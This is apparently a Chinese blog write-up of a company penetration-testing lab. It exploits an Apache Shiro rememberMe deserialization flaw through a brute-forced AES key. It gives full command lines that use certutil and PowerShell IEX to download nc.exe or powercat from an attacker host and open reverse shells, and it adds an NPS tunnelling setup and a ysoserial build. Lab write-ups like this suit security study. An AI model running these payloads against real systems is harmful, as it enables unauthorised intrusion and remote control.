背景:最近公司的师傅丢了个内网渗透的靶场让我们玩,需要通过对外映射的Web服务打进去。一开始看到是一个JeeCMS的站点,直接弱口令就进了后台。但是瞎搞一通都拿不到Shell。搜索了一番才知道原来方向错了,其实是一个Shiro反序列化的漏洞。

漏洞概述

  • Shiro使用 CookieRememberMeManager这个类对Cookie中的 remeberMe进行 序列化 => 使用密钥进行AES加密 => Base64编码,最后返回客户端 remebreme Cookie。在识别用户身份时需要对 rememberMe进行 Base64解码 => 使用密钥进行AES解密 =>Java反序列化
  • 漏洞成因:AES加密的密钥Key被硬编码在代码里,这意味着攻击者只要找到AES加密的密钥,就可以构造一个恶意对象。并对其进行序列化,AES加密,Base64编码,然后将其作为Cookie的 remember Me字段发送。Shiro将其进行解密并且反序列化,即可造成反序列化漏洞。
  • 漏洞特征:在返回包的 Set-Cookie 中存在 rememberMe=deleteMe 字段。
  • 漏洞分析:

漏洞复现

确定漏洞

  • 进入登录页面,输入弱口令 admin/password,并勾选 记住用户,然后登录并抓包。

Shiro-1

爆破Key

  • Ceye或者DNSLog上获取一个域名,然后借用工具ShiroScan对Key进行爆破。对于无回显的rce,无论通没通,响应码均为200,所以需要通过Ceye等平台来确定Key和利用链模块
  • 这里可以看到爆破结果为 4Av.CommonsBeanutils1.tbxcqv.ceye.io,其中的 4Av对应右侧Key,即 4AvVhmFLUs0KTA3Kprsdag==。利用链模块为 CommonsBeanutils1

Shiro-2

测试RCE

  • 这里还是借助工具Awesome_Shiro中的 Shiro-rce来一把梭。注意需要修改一下 Awesome_Shiro\shiro-rce\shiro_rce.py文件

    • 第13行中的 CommonsBeanutils1改为爆破成功用的模块。前面爆破得到的也是 CommonsBeanutils1,所以这里不用改
    • 第16行将 kPH+bIxk5D2deZiIxcaaaA==修改为爆破得到的Key,这里改为 4AvVhmFLUs0KTA3Kprsdag==
  • 修改完成后,执行命令,测试RCE。可以看到成功Ping到Ceye
$ python shiro_rce.py http://10.2.11.253:8088/ "ping test.tbxcqv.ceye.io"

Shiro-3

漏洞利用

一开始没有注意靶机的操作系统,这里是Windows。直接用工具里的脚本和网上的POC将靶机当作Linux打了半天。。。
  • Windows这里可以通过Netcat或者Powercat来反弹Shell
  • 先将 nc.exe或者 powercat.ps1放在服务器上某个目录中,然后开启HTTP服务
$ python -m http.server 80        # Python3
$ python -m SimpleHTTPServer 80   # Python2
  • 并在服务器开启监听
$ nc -lvvp 8765
  • 利用前面的RCE来下载 nc.exe或者 powercat.ps1
# Netcat
$ python shiro_rce.py http://10.2.11.253:8088/ "certutil.exe -urlcache -split -f http://<攻击机IP>/nc.exe 1.exe"
$ python shiro_rce.py http://10.2.11.253:8088/ "1.exe <攻击机IP> <攻击机监听端口> -e cmd.exe"

# Powercat
$ python shiro_rce.py http://10.2.11.253:8088/ "powershell IEX (New-Object System.Net.Webclient).DownloadString('http://<攻击机IP>/powercat.ps1');powercat -c <攻击机IP> -p <攻击机监听端口> -e cmd"  

Shiro-4

NPS

NPS是一款轻量级、高性能、功能强大的内网穿透代理服务器,参考文档:NPS文档
  • 在一台服务器上搭建NPS Server端,配置文件 nps/conf/nps.conf

    • 默认账号密码 admin/123,可在配置文件中修改
    • 默认配置文件使用了 80,443,8080,8024端口,若被占用会启动失败,可在配置文件中修改
  • Releases中找到靶机对应操作系统 Client端,并上传到服务器
  • 在靶机中执行命令下载文件
$ certutil.exe -urlcache -split -f http://<攻击机IP>:<端口>/npc.exe
  • 在NPS服务端的的Web界面新增一个客户端,然后在靶机启动无配置文件模式
$ ./npc.exe -server=<攻击机IP>:<端口> -vkey=<Web界面中显示的密钥>
  • 最后建立 HTTPSocks代理即可

其它

备注

部署Maven

Maven 是一个项目管理工具,可以对 Java 项目进行构建、依赖管理。Maven基于项目对象模型(POM project object model),可以通过一小段描述信息来管理项目的构建,报告和文档的软件项目管理工具(百度百科)。
  • 创建Maven目录,下载解压并修改配置文件
$ cd /usr/local/ && mkdir maven && cd maven/
$ wget http://mirrors.tuna.tsinghua.edu.cn/apache/maven/maven-3/3.6.3/binaries/apache-maven-3.6.3-bin.tar.gz
$ tar -zxvf apache-maven-3.6.3-bin.tar.gz    # 解压
$ cd apache-maven-3.6.3/conf/
$ vim settings.xml    # 修改配置文件
  • 修改仓库位置,找到 <localRepository>/path/to/local/repo</localRepository>,修改为:
<localRepository>/usr/local/repo</localRepository>
  • 然后在 </mirrors>前添加阿里云仓库
<mirror>
<id>nexus-aliyun</id>
<mirrorOf>*</mirrorOf>
<name>Nexus aliyun</name>
<url>http://maven.aliyun.com/nexus/content/groups/public</url>
</mirror>
  • 添加环境变量
$ vim /etc/profile

# 文件末尾加入
export MAVEN_HOME=/usr/local/maven/apache-maven-3.6.3
export PATH=${PATH}:${MAVEN_HOME}/bin

  • 保存退出,使文件生效后检查
$ source /etc/profile
$ mvn -v echo $MAVEN_HOME
$ which mvn      # 查看mvn工具的位置/usr/local/maven/bin/mvn
$ mvn -version    # 查看maven版本

生成ysoserial

ysoseria是一款目前最流行的Java反序列化Payload生成工具,目前支持29种的Payload生成。
  • 生成 ysoserial-0.0.6-SNAPSHOT-all.jar文件
$ git clone https://github.com/frohoff/ysoserial.git
$ cd ysoserial
$ mvn package -D skipTests

Shiro-5Shiro-6

最后修改:2020 年 10 月 18 日 11 : 27 PM
如果觉得我的文章对你有帮助,请我吃颗糖吧~